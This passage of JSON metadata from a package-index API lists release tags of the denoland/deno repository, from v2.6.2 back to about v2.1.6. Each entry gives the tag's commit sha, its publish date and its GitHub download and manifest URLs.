blished_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2